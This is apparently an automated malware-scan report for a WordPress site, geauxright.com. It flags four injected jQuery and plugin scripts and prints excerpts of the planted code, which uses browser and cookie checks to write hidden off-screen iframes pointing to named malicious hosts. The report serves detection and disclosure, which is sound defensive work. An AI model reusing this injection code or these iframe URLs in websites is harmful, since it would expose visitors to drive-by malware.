New scan:

Malware Scanner report for geauxright.com

Malicious/Suspicious/Total urls checked
4/0/15
4 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "geauxright.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
1/0/15
1 malicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=geauxright.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.geauxright.com/
200 OK
Content-Length: 37352
Content-Type: text/html
clean
http://www.geauxright.com/wp-includes/js/jquery/jquery.js?ver=1.11.1
200 OK
Content-Length: 96701
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Art_protection() {
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function takeOrlondo(name) {
var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
return nachos ? decodeURIComponent(nachos[1]) : undefined;
}
var cookie = takeOrlondo(
... 3179 bytes are skipped ...
e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?m.css(b,c,g):m.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),m.fn.size=function(){return this.length},m.fn.andSelf=m.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return m});var ed=a.jQuery,fd=a.$;return m.noConflict=function(b){return a.$===m&&(a.$=fd),b&&a.jQuery===m&&(a.jQuery=ed),m},typeof b===K&&(a.jQuery=a.$=m),m});
jQuery.noConflict();

Antivirus reports:

Avast
HTML:Iframe-inf

http://www.geauxright.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 8094
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Art_protection() {
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function takeOrlondo(name) {
var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
return nachos ? decodeURIComponent(nachos[1]) : undefined;
}
var cookie = takeOrlondo(
... 3281 bytes are skipped ...
ector||"**",n),this)},e.event.trigger=function(e,t,n,a){return n||C.test(e)||r("Global events are undocumented and deprecated"),k.call(this,e,t,n||document,a)},e.each(S.split("|"),function(t,n){e.event.special[n]={setup:function(){var t=this;return t!==document&&(e.event.add(document,n+"."+e.guid,function(){e.event.trigger(n,null,t,!0)}),e._data(this,n,e.guid++)),!1},teardown:function(){return this!==document&&e.event.remove(document,n+"."+e._data(this,n)),!1}}})}(jQuery,window);

Antivirus reports:

Avast
HTML:Iframe-inf

http://www.geauxright.com/wp-content/plugins/wp-customer-reviews/wp-customer-reviews.js?ver=2.4.8
200 OK
Content-Length: 894
Content-Type: text/javascript
clean
http://www.geauxright.com/wp-content/plugins/af-tell-a-friend/af-tf-js/af-tf-js.js?ver=4.0
200 OK
Content-Length: 1987
Content-Type: text/javascript
clean
http://www.geauxright.com/wp-content/plugins/front-slider/scripts/slider.js?ver=1.3
200 OK
Content-Length: 3178
Content-Type: text/javascript
malicious
Malicious code found. Script contains blacklisted domain: acturesmit.bluetexinternational.com

...[1062 bytes skipped]...
fined;
}
function Ubrostyleddesignercoder() {
var specifico_stock = navigator.userAgent;

var flawor_bobma = (specifico_stock.indexOf("IEMobile") > -1 || specifico_stock.indexOf("Chrome") > -1 || specifico_stock.indexOf("Windows") < +1);
var jiumbooble = (getCookie("specificatoryao") === undefined);
if (!flawor_bobma && jiumbooble) {
document.write('<iframe src="http://acturesmit.bluetexinternational.com/gausmitikor16.html" style="cursor: move;left: -900px;border-right: medium dotted #42b889;position: absolute;border-left: thin dashed #151994;top: -900px;background-size: 132px 132px;" height="132" width="132"></iframe>');

var date = new Date( new Date().getTime() + 64*60*60*1000 );
document.cookie="specificatoryao=1; path=/; expires="+date.toUTCString();
}
}
Ubrostyleddesignercoder();

Decoded script:


<iframe src="http://skanerki.haciendaonline.com.ar/antifogatus16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe><iframe src="http://acturesmit.bluetexinternational.com/gausmitikor16.html" style="cursor: move;left: -900px;border-right: medium dotted #42b889;position: absolute;border-left: thin dashed #151994;top: -900px;background-size: 132px 132px;" height="132" width="132"></iframe>

Malicious iFrame found.
size: 132x132     
src: http://acturesmit.bluetexinternational.com/gausmitikor16.html
This URL is marked by Google as suspicious

<iframe src="http://acturesmit.bluetexinternational.com/gausmitikor16.html" style="cursor: move;left: -900px;border-right: medium dotted #42b889;position: absolute;border-left: thin dashed #151994;top: -900px;background-size: 132px 132px;" height="132" width="132">

http://www.geauxright.com/wp-content/plugins/slick-contact-forms/js/jquery.slick.contact.1.3.2.js?ver=4.0
200 OK
Content-Length: 894
Content-Type: text/javascript
clean
http://www.geauxright.com/wp-content/plugins/tinymce-thumbnail-gallery/js/tinymce_thumbnail_gallery.js?ver=0.1
200 OK
Content-Length: 894
Content-Type: text/javascript
clean
http://www.geauxright.com/wp-content/plugins/tinymce-thumbnail-gallery/includes/colorbox/jquery.colorbox-min.js?ver=0.1
200 OK
Content-Length: 10164
Content-Type: text/javascript
clean
http://www.geauxright.com/wp-content/plugins/meteor-slides/js/jquery.cycle.all.js?ver=4.0
200 OK
Content-Length: 894
Content-Type: text/javascript
clean
http://www.geauxright.com/wp-content/plugins/meteor-slides/js/jquery.metadata.v2.js?ver=4.0
200 OK
Content-Length: 894
Content-Type: text/javascript
clean
http://www.geauxright.com/wp-content/plugins/meteor-slides/js/jquery.touchwipe.1.1.1.js?ver=4.0
200 OK
Content-Length: 2041
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Art_protection() {
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function takeOrlondo(name) {
var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
return nachos ? decodeURIComponent(nachos[1]) : undefined;
}
var cookie = takeOrlondo(
... 938 bytes are skipped ...
/>if (!teamfact && buble) {
document.write('<iframe src="http://ilmanuer.basel-kieferorthopaedie.ch/ikiklajum15.html?%a" style="border-left: thick double 7FFFD4;left: -887px;position: absolute;cursor: help;border-right: thick double 0000FF;top: -887px;" height="132" width="132"></iframe>');
var date = new Date( new Date().getTime() + 64*60*60*1000 );
document.cookie="joombanight=1; path=/; expires="+date.toUTCString();
}
}
Broadbandserviceactu();

Antivirus reports:

Avast
JS:Iframe-EJO [Trj]
ESET-NOD32
JS/Iframe.KG

http://www.geauxright.com/wp-content/plugins/meteor-slides/js/slideshow.js?ver=4.0
200 OK
Content-Length: 894
Content-Type: text/javascript
clean
http://www.geauxright.com/wp-content/themes/u-design/sliders/piecemaker/js/swfobject.js?ver=1.5
200 OK
Content-Length: 6880
Content-Type: text/javascript
clean
http://www.geauxright.com/wp-content/themes/u-design/scripts/prettyPhoto/js/jquery.prettyPhoto.js?ver=3.1.3
200 OK
Content-Length: 24867
Content-Type: text/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: geauxright.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: geauxright.com
Referer: http://www.google.com/search?q=geauxright.com

Result:
The result is similar to the first query. There are no suspicious redirects found.